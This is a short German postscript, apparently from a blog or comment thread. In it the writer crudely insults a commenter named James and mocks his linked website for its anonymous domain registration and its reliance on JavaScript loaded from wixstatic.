PS: Hey, James, du Brechmittel! Dass die von dir verlinkte Website – übrigens in einer über einen Dienstleister aus Florida anonym registrierten Domain – ohne Javascript gar nichts anzeigt, lässt dich keine Spur seriöser wirken. Da hilft es auch nicht, dass man mit Javascript ein Foto von einem Typen mit Schlips sieht…

…der vermutlich etwas seriöser aussieht als du. Moment, aus welcher Domain bettest du die ganzen externen Javascript-Fetzen ein? wixstatic (punkt) com? Mit Verlaub, du Wichser, ich finde, das passt zu dir!